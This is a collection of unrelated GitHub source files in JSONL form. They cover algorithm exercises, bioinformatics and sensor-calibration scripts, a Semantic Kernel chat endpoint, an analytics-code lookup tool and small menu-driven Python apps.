+{"seq_id":"15961172138","text":"from Solution import Solution\n\ndef main():\n\n testInput = [3,4,5,1,2] # Output: 1\n testInput = [4,5,6,7,0,1,2] # Output: 0\n #testInput = [11,13,15,17] # Output: 11\n \n # instantiate Solution class\n solution = Solution()\n\n result = solution.findMin(testInput)\n\n print(f\"Minimum number in rotated, sorted array: {result}\")\n\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"tkinneen/leetcodeProblems","sub_path":"Problem_153_Find_Minimum_In_Rotated_Sorted_Array/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"10933545921","text":"import subprocess\nimport sys\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('-s','--sample',nargs='?',help='Bucket26..36 or Prompt_data')\nparser.add_argument('-id','--ID', nargs='+',help='Cell ID', type=int)\nparser.add_argument('-e','--E',nargs='+',help='Min E and Max E',type=int)\nargs = parser.parse_args()\nSet_ID = set(args.ID)\n\nprint(f\"Data = {args.sample} CellID in {args.ID} {args.E[1]}>E>{args.E[0]}\")\nprint(f\"CellID = {args.ID}\")\n","repo_name":"karna5566/Code-Belle-II","sub_path":"Mogekokko/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"11788971379","text":"from graph import Graph,has_cycle\nfrom testing import *\nimport random\nimport matplotlib.pyplot as plt\n\n\ndef createRandomGraph(i,j):\n\n # if the number of edges is greater than the number of possible node connections (without duplicates) then we cannot create a list without duplicate edges\n # n Choose 2 max possible connections\n if j > (i * (i - 1)) // 2:\n raise ValueError(\"Too many edges for the given number of nodes\")\n\n graph = Graph(i)\n\n # generates a list of i nodes\n nodes = list(range(i))\n edge_count = 0\n\n while edge_count < j:\n node1 = random.choice(nodes)\n node2 = random.choice(nodes)\n\n # Skip current iteration if the same edge or duplicate edge is found\n if node1 == node2 or graph.are_connected(node1, node2):\n continue \n \n graph.add_edge(node1, node2)\n edge_count += 1\n\n return graph\n\n\n\n\n# number of each graph\n#numEdges = [500,1000,1500,2000,2500]\n\nnumEdges = [25,50,75,100,125,150,175,200]\ndef experiment1():\n \n numGraphs = 100\n cycleCounts = []\n\n for numEdge in numEdges:\n cycleCount = 0 \n\n\n for i in range(numGraphs):\n graph = createRandomGraph(100, numEdge)\n \n if(has_cycle(graph)):\n cycleCount += 1\n\n cycleCounts.append(cycleCount)\n \n print(cycleCounts)\n return cycleCounts \n\n\ncycleCounts = experiment1()\n\nplt.plot(numEdges,cycleCounts)\nplt.xlabel(\"number of Edges\")\nplt.ylabel(\"Cycle Probability (%)\")\nplt.title(\"Edges vs Cycle Probability (%)\")\nplt.show()\n\n\n\n\n","repo_name":"Mazen1004/3XB3Labs","sub_path":"Lab 2/exp1.py","file_name":"exp1.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"10933545921","text":"#!/usr/bin/env python\n\n\"\"\"\nRead a table dump in the UCSC gene table format and print a tab separated\nlist of intervals corresponding to requested features of each gene.\n\nusage: ucsc_gene_table_to_intervals.py [options] < gene_table.txt\n\noptions:\n  -h, --help show this help message and exit\n  -rREGION, --region=REGION\n                        Limit to region: one of coding, utr3, utr5, transcribed [default]\n  -e, --exons Only print intervals overlapping an exon\n\"\"\"\n\nimport optparse\nimport sys\n\n\ndef main():\n    # Parse command line\n    parser = optparse.OptionParser(usage=\"%prog [options] < gene_table.txt\")\n    parser.add_option(\n        \"-r\",\n        \"--region\",\n        dest=\"region\",\n        default=\"transcribed\",\n        help=\"Limit to region: one of coding, utr3, utr5, transcribed [default]\",\n    )\n    parser.add_option(\n        \"-e\", \"--exons\", action=\"store_true\", dest=\"exons\", help=\"Only print intervals overlapping an exon\"\n    )\n    parser.add_option(\"-s\", \"--strand\", action=\"store_true\", dest=\"strand\", help=\"Print strand after interval\")\n    parser.add_option(\n        \"-b\",\n        \"--nobin\",\n        action=\"store_false\",\n        dest=\"discard_first_column\",\n        default=True,\n        help=\"file doesn't contain a 'bin' column (use this for pre-hg18 files)\",\n    )\n    options, args = parser.parse_args()\n    assert options.region in (\"coding\", \"utr3\", \"utr5\", \"transcribed\"), \"Invalid region argument\"\n\n    # Read table from stdin and handle each gene\n    for line in sys.stdin:\n        # Parse fields from gene table\n        fields = line.split(\"\\t\")\n        if options.discard_first_column:\n            fields.pop(0)\n        chrom = fields[1]\n        strand = fields[2]\n        tx_start = int(fields[3])\n        tx_end = int(fields[4])\n        cds_start = int(fields[5])\n        cds_end = int(fields[6])\n\n        # Determine the subset of the transcribed region we are interested in\n        if options.region == \"utr3\":\n            if strand == \"-\":\n                region_start, region_end = tx_start, cds_start\n            else:\n                region_start, region_end = cds_end, tx_end\n        elif options.region == \"utr5\":\n            if strand == \"-\":\n                region_start, region_end = cds_end, tx_end\n            else:\n                region_start, region_end = tx_start, cds_start\n        elif options.region == \"coding\":\n            region_start, region_end = cds_start, cds_end\n        else:\n            region_start, region_end = tx_start, tx_end\n\n        # If only interested in exons, print the portion of each exon overlapping\n        # the region of interest, otherwise print the span of the region\n        if options.exons:\n            exon_starts = [int(_) for _ in fields[8].rstrip(\",\\n\").split(\",\")]\n            exon_ends = [int(_) for _ in fields[9].rstrip(\",\\n\").split(\",\")]\n            for start, end in zip(exon_starts, exon_ends):\n                start = max(start, region_start)\n                end = min(end, region_end)\n                if start < end:\n                    if options.strand:\n                        print_tab_sep(chrom, start, end, strand)\n                    else:\n                        print_tab_sep(chrom, start, end)\n        else:\n            if options.strand:\n                print_tab_sep(chrom, region_start, region_end, strand)\n            else:\n                print_tab_sep(chrom, region_start, region_end)\n\n\ndef print_tab_sep(*args):\n    \"\"\"Print items in `args` to stdout separated by tabs\"\"\"\n    print(\"\\t\".join(str(f) for f in args))\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"bxlab/bx-python","sub_path":"scripts/ucsc_gene_table_to_intervals.py","file_name":"ucsc_gene_table_to_intervals.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"3"}
+{"seq_id":"26621168692","text":"from clases import *\n\nadmin=1\ninvitado=2\nprint (f\"\"\"\n{admin})Administracion.\n{invitado})Invitado.\n\"\"\")\nseleccion=int (input(\"SELECCIONE EL USUARIO QUE DESEA INGRESAR: \\n\"))\nif seleccion == admin:\n usuario=input(\"Ingrese el mail de administracion: \\n\")\n continuar=True\n print(\"Bienvenido al menu de Administración.\\n\")\n while usuario == \"lucaslopez@gmail.com\" and continuar:\n \n ver_catalogo=1\n agregar_vehiculo=2\n salir=3\n print(f\"\"\"\n !Seleccione la acción a realizar:\n {ver_catalogo})Ver Vehículos.\n {agregar_vehiculo})Cargar Vehiculo.\n {salir})Salir.\n \"\"\")\n accion=int(input(\": \\n\"))\n if accion == agregar_vehiculo:\n agregar_moto=1\n agregar_auto=2\n agregar_bicicleta=3\n print(f\"\"\"\n Seleccione el Vehículo que desea agregar.\n {agregar_moto})Motos.\n {agregar_auto})Autos.\n {agregar_bicicleta})Bicicletas.\n \"\"\")\n vehiculo=int(input(\": \\n\"))\n if vehiculo == agregar_moto:\n print(\"Ingrese los datos de la moto.\")\n marca_moto= input(\"Ingrese la marca: \\n\")\n modelo_moto=int(input(\"Ingrese el modelo: \\n\"))\n precio_moto=int(input(\"Ingrese el Precio: \\n\"))\n moto_nueva=Motos(marca_moto,modelo_moto,precio_moto)\n print(moto_nueva.marca,moto_nueva.modelo,moto_nueva.precio)\n elif vehiculo == agregar_auto:\n print(\"Ingrese los datos del auto.\")\n marca_auto=input(\"ingrese la marca: \\n\")\n modelo_auto=int(input(\"Ingrese el modelo: \\n\"))\n precio_auto=int(input(\"Ingrese el Precio: \\n\"))\n auto_nuevo=Auto(marca_auto,modelo_auto,precio_auto)\n print(auto_nuevo.marca,auto_nuevo.modelo,auto_nuevo.precio)\n elif vehiculo == agregar_bicicleta:\n print(\"Ingrese los datos de la bicicleta.\")\n marca_bicicleta=input(\"ingrese la marca: \\n\")\n rodado_bicicleta=int(input(\"Ingrese el rodado: \\n\"))\n precio_bicicleta=int(input(\"Ingrese el Precio: \\n\"))\n bicicleta_nueva=Bicicletas(marca_bicicleta,rodado_bicicleta,precio_bicicleta)\n print(bicicleta_nueva.marca,bicicleta_nueva.rodado,bicicleta_nueva.precio)\n elif accion==ver_catalogo:\n print (\"\\nCATÁLOGO DE MOTOS:\\n\")\n print(f\"Marca: {honda.marca}\\nModelo: {honda.modelo}\\nPrecio: {honda.precio}\\n\")\n print(f\"Marca: {motomel.marca}\\nModelo: {motomel.modelo}\\nPrecio: {motomel.precio}\\n\")\n print(f\"Marca: {moto_nueva.marca}\\nModelo: {moto_nueva.modelo}\\nPrecio: {moto_nueva.precio}\")\n print(\"\\nCATALOGO DE AUTOS:\\n\")\n print(f\"Marca: {vw.marca}\\nModelo: {vw.modelo}\\nPrecio: {vw.precio}\\n\")\n print(f\"Marca: {ford.marca}\\nModelo: {ford.modelo}\\nPrecio: {ford.precio}\\n\")\n print(f\"Marca: {auto_nuevo.marca}\\nModelo: {auto_nuevo.modelo}\\nPrecio: {auto_nuevo.precio}\")\n print(\"\\nCATALOGO DE BICICLETAS:\\n\")\n print(f\"Marca: {orbea.marca}\\nRodado: {orbea.rodado}\\nPrecio: {orbea.precio}\\n\")\n print(f\"Marca: {venzo.marca}\\nRodado: {venzo.rodado}\\nPrecio: {venzo.precio}\\n\")\n print(f\"Marca: {bicicleta_nueva.marca}\\nRodado: {bicicleta_nueva.rodado}\\nPrecio: {bicicleta_nueva.precio}\")\n elif accion==salir:\n print(\"Hasta la Próxima.\")\n continuar=False\n else:\n print(\"Opcion no valida\")\nelif seleccion == invitado:\n print (\"\\nCATÁLOGO DE MOTOS:\\n\")\n print(f\"Marca: {honda.marca}\\nModelo: {honda.modelo}\\nPrecio: {honda.precio}\\n\")\n print(f\"Marca: {motomel.marca}\\nModelo: {motomel.modelo}\\nPrecio: {motomel.precio}\\n\")\n print(\"\\nCATALOGO DE AUTOS:\\n\")\n print(f\"Marca: {vw.marca}\\nModelo: {vw.modelo}\\nPrecio: {vw.precio}\\n\")\n print(f\"Marca: {ford.marca}\\nModelo: 
{ford.modelo}\\nPrecio: {ford.precio}\\n\")\n print(\"\\nCATALOGO DE BICICLETAS:\\n\")\n print(f\"Marca: {orbea.marca}\\nRodado: {orbea.rodado}\\nPrecio: {orbea.precio}\\n\")\n print(f\"Marca: {venzo.marca}\\nRodado: {venzo.rodado}\\nPrecio: {venzo.precio}\\n\")\nelse:\n print(\"Usuario incorrecto.\")","repo_name":"LucasNLopez/Concesionaria","sub_path":"usuarios.py","file_name":"usuarios.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"33178662320","text":"import openai\nfrom dotenv import load_dotenv\nfrom quart import Quart, request, jsonify\nimport semantic_kernel as sk\nimport semantic_kernel.connectors.ai.open_ai as sk_oai\nimport os\nfrom quart_cors import cors\n\n\n\napp = Quart(__name__)\n# cors() already adds the CORS headers to every response app-wide\napp = cors(app, allow_origin=\"*\")\n# Load environment variables\nload_dotenv()\nopenai.api_key = os.getenv('OPENAI_API_KEY')\norg_id = os.getenv('OPENAI_ORG_ID')\n# Setup from provided sample\nsystem_message = \"\"\"\nYou are a chat bot. Your name is Mosscap and\nyou have one goal: figure out what people need.\n\"\"\"\n\nkernel = sk.Kernel()\n#kernel.add_chat_service(\n#    \"chat-gpt\", sk_oai.OpenAIChatCompletion(\"gpt-3.5-turbo\", openai.api_key,org_id)\n#)\nfrom semantic_kernel.connectors.ai.open_ai import AzureChatCompletion\n\n#deployment, api_key, endpoint = sk.azure_openai_settings_from_dot_env()\n\n\ndeployment = os.environ.get('AZURE_OPENAI_DEPLOYMENT_NAME')\napi_key = os.environ.get('AZURE_OPENAI_API_KEY')\nendpoint = os.environ.get('AZURE_OPENAI_ENDPOINT')\n\nkernel.add_chat_service(\"chat_completion\", AzureChatCompletion(deployment, endpoint, api_key))\n\nprompt_config = sk.PromptTemplateConfig.from_completion_parameters(\n    max_tokens=6000, temperature=0.7, top_p=0.8\n)\nprompt_template = sk.ChatPromptTemplate(\n    \"{{$user_input}}\", kernel.prompt_template_engine, prompt_config\n)\nprompt_template.add_system_message(system_message)\n\nfunction_config = sk.SemanticFunctionConfig(prompt_config, prompt_template)\nchat_function = kernel.register_semantic_function(\"ChatBot\", \"Chat\", function_config)\n\n# Refactored logic from the /engage route\nasync def engage_logic(user_input):\n    # Set up context variables\n    context_vars = sk.ContextVariables()\n    context_vars[\"user_input\"] = user_input\n\n    # Optionally initialize chat_history if needed\n    context_vars[\"chat_history\"] = \"\"\n\n    # Interact with Semantic Kernel\n    answer = await kernel.run_async(chat_function, input_vars=context_vars)\n\n    # Update chat_history for future interactions if needed\n    context_vars[\"chat_history\"] += f\"\\nUser:> {user_input}\\nChatBot:> {answer}\\n\"\n\n    # Convert the answer object to a string\n    answer_text = str(answer)\n    \n    return answer_text\n\n@app.route('/engage', methods=['POST'])\nasync def engage():\n    data = await request.get_json()\n    user_input = data['user_input']\n\n    # Call the refactored logic function\n    answer_text = await engage_logic(user_input)\n\n    return jsonify({\"response\": answer_text})\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port=5000, debug=True)\n","repo_name":"passadis/learning-aid","sub_path":"python/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"13043988107","text":"import argparse\nimport requests\n\ndef get_analytics_codes(domain):\n # Hacer la request hacia la API\n response = requests.get(f\"https://api.hackertarget.com/analyticslookup/?q={domain}\")\n\n # Verificar si la request tuvo éxito\n if response.status_code != 200:\n print(\"Error al obtener los códigos de analytics\")\n return []\n\n # Procesar la respuesta y obtener los códigos\n lines = response.text.strip().split(\"\\n\")\n analytics_codes = [line.split(\",\")[1] for line in lines]\n\n return analytics_codes\n\ndef get_analytics_info(codes):\n results = []\n\n for code in codes:\n # Hacer la request hacia la API con cada código\n response = requests.get(f\"https://api.hackertarget.com/analyticslookup/?q={code}\")\n\n # Verificar si la request tuvo éxito\n if response.status_code != 200:\n print(f\"Error al obtener información de analytics para el código {code}\")\n continue\n\n # Procesar la respuesta y agregarla a la lista de resultados\n results.append(response.text.strip())\n\n return results\n\ndef main():\n # Crear el parser para los argumentos\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-d\", \"--domain\", required=True, help=\"Dominio a utilizar\")\n parser.add_argument(\"-o\", \"--output\", help=\"Archivo donde guardar la salida\")\n args = parser.parse_args()\n\n # Obtener el dominio y el archivo de salida del argumento\n domain = args.domain\n output_file = args.output\n\n codes = get_analytics_codes(domain)\n results = get_analytics_info(codes)\n\n # Guardar la salida en el archivo de salida o mostrarla en pantalla\n if output_file:\n with open(output_file, \"w\") as f:\n for result in results:\n f.write(result + \"\\n\")\n else:\n for result in results:\n print(result)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"A1ux/BugBountyResources","sub_path":"scripts/analytics_domains.py","file_name":"analytics_domains.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"5517516225","text":"from django.conf.urls.defaults import patterns, include, url\nfrom django.contrib import admin\nfrom taskheat.utils.views import ExtraContextTemplateView\n\n\nadmin.autodiscover()\nurlpatterns = patterns('',\n url(r'^$',\n ExtraContextTemplateView.as_view(template_name='core/index.html',\n extra_context={\n 'page_name': 'Home'\n }),\n name='home'),\n url(r'^', include('taskheat.core.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n url(r'^accounts/', include('django.contrib.auth.urls')),\n)\n","repo_name":"wraithan/taskheat","sub_path":"taskheat/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"4168422041","text":"import random\n\nfrom faker import Faker\n\nfrom apiwrapper.endpoints.device_server import DeviceServer\nfrom tests.endpoints.test_endpoint import EndpointTest\n\n\nclass DeviceServerTest(EndpointTest):\n __base_endpoint_url = \"/device-server\"\n\n @property\n def _base_endpoint(self):\n return self.__base_endpoint_url\n\n def setUp(self):\n super().setUp(DeviceServer)\n self.faker = Faker()\n\n def test_get_base_endpoint(self):\n endpoint_should_be = self._base_endpoint\n\n endpoint_to_check = self.test_class._get_base_endpoint()\n\n self.assert_parameters(endpoint_should_be, endpoint_to_check)\n\n def test_get_all_device_servers(self):\n endpoint_should_be = self._base_endpoint\n\n endpoint_to_check = self.test_class.get_all_device_servers()\n\n self.assert_parameters(endpoint_should_be, endpoint_to_check)\n\n def test_get_device_server_by_id(self):\n endpoint_should_be = self._base_endpoint\n endpoint_should_be += \"/%d\" % self.random_id\n\n endpoint_to_check = self.test_class.get_device_server_by_id(\n self.random_id)\n\n self.assert_parameters(endpoint_should_be, endpoint_to_check)\n\n def test_create_new_device_server_endpoint(self):\n endpoint_should_be = self._base_endpoint\n\n endpoint_to_check, _ = self.test_class.create_new_device_server(\n self.random_uuid\n )\n\n self.assert_parameters(endpoint_should_be, endpoint_to_check)\n\n def test_create_new_device_server_payload(self):\n description = self.faker.name()\n permitted_ips = []\n for x in range(0, random.randint(1, 10)):\n permitted_ips.append(self.faker.ssn())\n\n payload_should_be = {\n \"description\": description,\n \"secret\": self.api_client.api_key,\n \"permitted_ips\": permitted_ips\n }\n\n _, payload_to_check = \\\n self.test_class.create_new_device_server(\n description, permitted_ips)\n\n self.assert_parameters(payload_should_be, payload_to_check)\n","repo_name":"PJUllrich/Complete-Bunq-API-Python-Wrapper","sub_path":"tests/endpoints/test_device_server.py","file_name":"test_device_server.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"}
+{"seq_id":"73585214161","text":"import json\nimport argparse\nimport pathlib\nimport datetime as dt\nfrom functools import partial\n\nimport paho.mqtt.client as mqtt\n\nfrom dataclasses import dataclass\n\nPREFIX = \"beehive\"\nROLAND_TOPIC = \"B-value\"\n\n# This suffix is appended to the system name to indicate\n# the values have been calibrated\nSUFFIX = \"calibrated\"\n\n\ndef IDENTITY(x):\n return x\n\n\n@dataclass\nclass SensorValues:\n temperature: float\n humidity: float\n\n @classmethod\n def from_raw(cls, temperature, humidity):\n return cls(\n temperature=raw2temperature(temperature),\n humidity=raw2humidity(humidity),\n )\n\n\ndef raw2humidity(humidity):\n return humidity * 100 / 65535.0\n\n\ndef raw2temperature(temperature):\n return temperature * 175.0 / 65535.0 - 45.0\n\n\ndef process_sensor_payload(sensor_payload):\n id_, temperature, humidity = sensor_payload.split(\",\")\n assert temperature[0] == \"T\"\n assert humidity[0] == \"H\"\n return id_, int(temperature[1:], 16), int(humidity[1:], 16)\n\n\ndef process_payload(payload):\n header, *sensors = payload.decode(\"ascii\").split(\";\")\n sequence, timestamp = header.split(\",\")\n timestamp = dt.datetime.fromisoformat(timestamp.split(\"+\")[0])\n sensors = {\n id_: SensorValues.from_raw(temperature, humidity)\n for id_, temperature, humidity in\n (process_sensor_payload(sensor) for sensor in sensors)\n }\n return sequence, timestamp, sensors\n\n\ndef produce_roland_message(name, cvs, sequence):\n res = []\n values = [\n f\"{id_},{values.temperature},{values.humidity}\"\n for id_, values in sorted(cvs.items())\n ]\n payload = \":\".join([f\"{name}-{SUFFIX},{sequence}\"] + values)\n res.append((ROLAND_TOPIC, payload))\n return res\n\n\ndef clamp16bit(value):\n return max(0, min(int(value), 65535))\n\n\ndef temperature2raw(temperature):\n # temperature * 175.0 / 65535.0 - 45.0\n return clamp16bit((temperature + 45) / 175.0 * 65535.0)\n\n\ndef humidity2raw(humidity):\n return clamp16bit(humidity / 100.0 * 65535.0)\n\n\ndef native_remapping(cvs):\n res = []\n for id_, values in sorted(cvs.items()):\n res.append(\n f\"{id_},\"\n f\"T{temperature2raw(values.temperature):04x},\"\n f\"H{humidity2raw(values.humidity):04x}\"\n )\n return res\n\n\ndef produce_calibrated_native_message(name, cvs, timestamp, sequence):\n topic = f\"{PREFIX}-{SUFFIX}/{name}\"\n payload = \";\".join(\n [f\"{sequence},{timestamp.isoformat()}\"] +\n native_remapping(cvs)\n )\n return topic, payload\n\n\ndef generate_calibrated_messages(name, payload, calibrations):\n sequence, timestamp, sensor_values = process_payload(payload)\n cvs = {}\n for id_, values in sensor_values.items():\n cvs[id_] = calibrations[id_](values)\n\n messages = produce_roland_message(name, cvs, sequence)\n messages.append(produce_calibrated_native_message(name, cvs, timestamp, sequence))\n\n return messages\n\n\ndef apply_calibration(calibration, v):\n return SensorValues(\n temperature=calibration[\"temperature\"][\"slope\"] * v.temperature +\n calibration[\"temperature\"][\"intercept\"],\n humidity=calibration[\"humidity\"][\"slope\"] * v.humidity +\n calibration[\"humidity\"][\"intercept\"]\n )\n\n\ndef load_calibrations(path):\n with path.open() as inf:\n data = json.load(inf)\n\n reference_id = data[\"reference_id\"]\n\n testo_calibration = IDENTITY\n if \"testo-calibration\" in data:\n testo_calibration = partial(\n apply_calibration,\n data[\"testo-calibration\"],\n )\n\n assert reference_id not in data[\"calibrations\"]\n\n calibrations = {\n reference_id: 
testo_calibration,\n    }\n\n    for id_, calibration in data[\"calibrations\"].items():\n        inner_function = partial(\n            apply_calibration,\n            calibration,\n        )\n        # bind the current inner_function via a default argument; a bare closure\n        # would late-bind and every entry would end up using the last calibration\n        calibrations[id_] = lambda values, f=inner_function: testo_calibration(f(values))\n\n    return calibrations\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--mqtt-host\", default=\"localhost\")\n    parser.add_argument(\"--mqtt-port\", type=int, default=1883)\n    parser.add_argument(\"--mqtt-topic\", default=f\"{PREFIX}/#\")\n    parser.add_argument(\"--calibration\", required=True, type=pathlib.Path)\n    opts = parser.parse_args()\n\n    calibrations = load_calibrations(opts.calibration)\n\n    def on_connect(*_args):\n        client.subscribe(opts.mqtt_topic)\n\n    def on_message(client, userdata, msg):\n        name = msg.topic[len(f\"{PREFIX}/\"):]\n        for topic, payload in generate_calibrated_messages(\n            name, msg.payload, calibrations\n        ):\n            print(topic, payload)\n            client.publish(topic, payload)\n\n    client = mqtt.Client()\n    client.on_connect = on_connect\n    client.on_message = on_message\n\n    client.connect(opts.mqtt_host, opts.mqtt_port, 60)\n    client.loop_forever()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"deets/beehive-monitor","sub_path":"scripts/calibration-service.py","file_name":"calibration-service.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"11377729482","text":"import string\nimport logging\nimport os\nfrom datetime import date\n\nfrom itertools import product\nimport numpy as np\nimport pandas as pd\n\nlog = logging.getLogger(__file__)\nlog.setLevel(logging.DEBUG)\n\nlogdir = os.environ.get(\"MEASURE_LOG_DIRECTORY\", \".\")\nlogfile = os.path.join(logdir, f\"measures_{date.today().isoformat()}.log\")\nhand = logging.FileHandler(logfile)\nhand.setLevel(logging.DEBUG)\nformatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\nhand.setFormatter(formatter)\n# attach the handler, otherwise the log records never reach the file\nlog.addHandler(hand)\n\n\ndef measure_single(image_reader, measure, columns, progress_bar=None, **kwargs):\n\n    metadata = image_reader.get_metadata()\n    size_z = metadata[\"SizeZ\"]\n    size_c = metadata[\"SizeC\"]\n    size_t = metadata[\"SizeT\"]\n    data = pd.DataFrame(\n        np.empty((size_z * size_c * size_t, len(columns))), columns=columns\n    )\n    labels = metadata.get(\"ChannelLabels\", string.ascii_uppercase[:size_c])\n    for col in columns:\n        if col in metadata:\n            data[col] = metadata[col]\n\n    if progress_bar is not None:\n        progress_bar.max = size_z * size_c * size_t\n        progress_bar.value = 0\n\n    for i, ((c, z, t), plane) in enumerate(image_reader):\n        if progress_bar is not None:\n            progress_bar.description = f\"Frame {i}/{size_z * size_c * size_t}\"\n            progress_bar.value = i + 1\n\n        data.loc[i, [\"C\", \"Z\", \"T\"]] = c, z, t\n        data.loc[i, \"ChannelLabel\"] = labels[c]\n        m = measure(plane, metadata, **kwargs)\n        for key in m:\n            data.loc[i, key] = m[key]\n    data[\"AquisitionDate\"] = pd.to_datetime(data[\"AquisitionDate\"])\n\n    return data\n\n\ndef measure_process(lock, hf5_record, image_reader, measure, columns, **kwargs):\n    module = measure.__module__.split(\".\")[-1]\n    try:\n        log.info(f\"treating image #{image_reader.id}\")\n        data = measure_single(\n            image_reader, measure, columns, progress_bar=None, **kwargs\n        )\n    except Exception as e:\n        log.info(\n            f\"Error {type(e)}: {e} in measuring image {image_reader.id}\"\n            f\" with {measure.__name__} from {module}\"\n        )\n        raise e\n    try:\n        lock.acquire()\n        with pd.HDFStore(hf5_record, \"a\") as file:\n            file.append(key=module, value=data, data_columns=[\"AquisitionDate\"])\n    finally:\n        lock.release()\n    return data\n","repo_name":"centuri-engineering/auto_metro","sub_path":"auto_metro/batch.py","file_name":"batch.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"16178758255","text":"from ast import In\nfrom interface import InterfacePrints\nfrom livros_controller import LivrosController\nfrom aluguel_controller import AlugueisController\nfrom multa_controller import MultaController\n\nclass AdmController:\n def __init__(self, conn):\n self.conn = conn\n self.livros_controller = LivrosController(conn)\n self.alugueis_controller = AlugueisController(conn)\n self.multa_controller = MultaController(conn)\n\n def login(self):\n \n login = input(\"Login: \")\n senha = input(\"Senha: \")\n\n if login != 'admin' or senha != 'admin':\n InterfacePrints.print_invalid_login()\n return\n self.run()\n\n def run(self):\n\n InterfacePrints.print_adm_menu()\n try:\n escolha = int(input())\n except:\n InterfacePrints.print_invalid_option()\n self.run()\n return\n\n self.executar_escolha(escolha)\n\n def executar_escolha(self, escolha):\n\n # Livros\n if escolha == 1:\n self.administrar_livros()\n\n # Usuarios\n elif escolha == 2:\n self.administrar_usuarios()\n\n elif escolha == 3:\n self.listar_usuarios()\n \n elif escolha == 4:\n self.listar_livros()\n\n elif escolha == 5:\n id_aluguel = input(\"Id do aluguel: \")\n self.alugueis_controller.resolver_aluguel(id_aluguel)\n InterfacePrints.waiting_key_msg()\n\n elif escolha == 6:\n id_multa = input(\"Id da multa: \")\n self.multa_controller.resolver_multa(id_multa)\n InterfacePrints.waiting_key_msg()\n\n elif escolha == 0:\n InterfacePrints.print_exiting_msg()\n return\n else:\n InterfacePrints.print_invalid_option()\n self.run()\n \n self.run()\n\n def administrar_livros(self):\n InterfacePrints.print_add_remove_edit()\n auxEscolha = int(input())\n if auxEscolha == 1:\n nome = input(\"Nome: \")\n descricao = input(\"Descricao: \")\n self.livros_controller.criar_livro((nome, descricao))\n elif auxEscolha == 2:\n id_livro = input(\"Id do livro: \")\n self.livros_controller.excluir_livro(id_livro)\n elif auxEscolha == 3:\n id_livro = input(\"Id do livro: \")\n nome = input(\"Nome: \")\n descricao = input(\"Descricao: \")\n self.livros_controller.editar_livro((nome, descricao, id_livro))\n elif auxEscolha == 0:\n self.run()\n else:\n InterfacePrints.print_invalid_option()\n self.run()\n\n def administrar_usuarios(self):\n InterfacePrints.print_add_remove_edit()\n auxEscolha = int(input())\n if auxEscolha == 1:\n login = input(\"Login: \")\n senha = input(\"Senha: \")\n # input with 0 or 1\n permissao = input(\"Permissao: \")\n self.criar_usuario((login, senha, permissao), self.conn)\n elif auxEscolha == 2:\n id_usr = input(\"Id do usuario: \")\n self.excluir_usuario(id_usr, self.conn)\n elif auxEscolha == 3:\n id_usr = input(\"Id do usuario: \")\n login = input(\"Login: \")\n senha = input(\"Senha: \")\n permissao = input(\"Permissao: \")\n self.editar_usuario((login, senha, permissao ,id_usr), self.conn)\n elif auxEscolha == 0:\n self.run()\n else:\n InterfacePrints.print_invalid_option()\n self.run()\n\n\n def criar_usuario(self, usuario, conn):\n sql = ''' INSERT INTO usuarios(login,senha,permissoes)\n VALUES(?,?,?) '''\n cur = conn.cursor()\n cur.execute(sql, usuario)\n conn.commit()\n return cur.lastrowid\n\n def excluir_usuario(self, id_usuario, conn):\n sql = 'DELETE FROM usuarios WHERE id=?'\n cur = conn.cursor()\n cur.execute(sql, (id_usuario,))\n conn.commit()\n return 0\n\n def editar_usuario(self, usuario, conn):\n sql = ''' UPDATE usuarios\n SET login = ? ,\n senha = ? 
,\n                  permissoes = ?\n              WHERE id = ?'''\n        cur = conn.cursor()\n        cur.execute(sql, usuario)\n        conn.commit()\n        return 0\n\n    def listar_usuarios(self):\n        cur = self.conn.cursor()\n        cur.execute(\"SELECT * FROM usuarios\")\n\n        usuarios = cur.fetchall()\n        InterfacePrints._clear()\n        for usuario in usuarios:\n            print('Id: ', usuario[0])\n            print('Usuario: ', usuario[1])\n            print('Senha: ', usuario[2])\n            print('Permissao: ', usuario[3])\n            print('=======================')\n        InterfacePrints.waiting_key_msg()\n        return usuarios\n\n    def listar_livros(self):\n        cur = self.conn.cursor()\n        cur.execute(\"SELECT * FROM livros\")\n\n        livros = cur.fetchall()\n        InterfacePrints._clear()\n        for livro in livros:\n            print('Id: ', livro[0])\n            print('Nome: ', livro[1])\n            print('Descricao: ', livro[2])\n            print('=======================')\n        \n        InterfacePrints.waiting_key_msg()\n    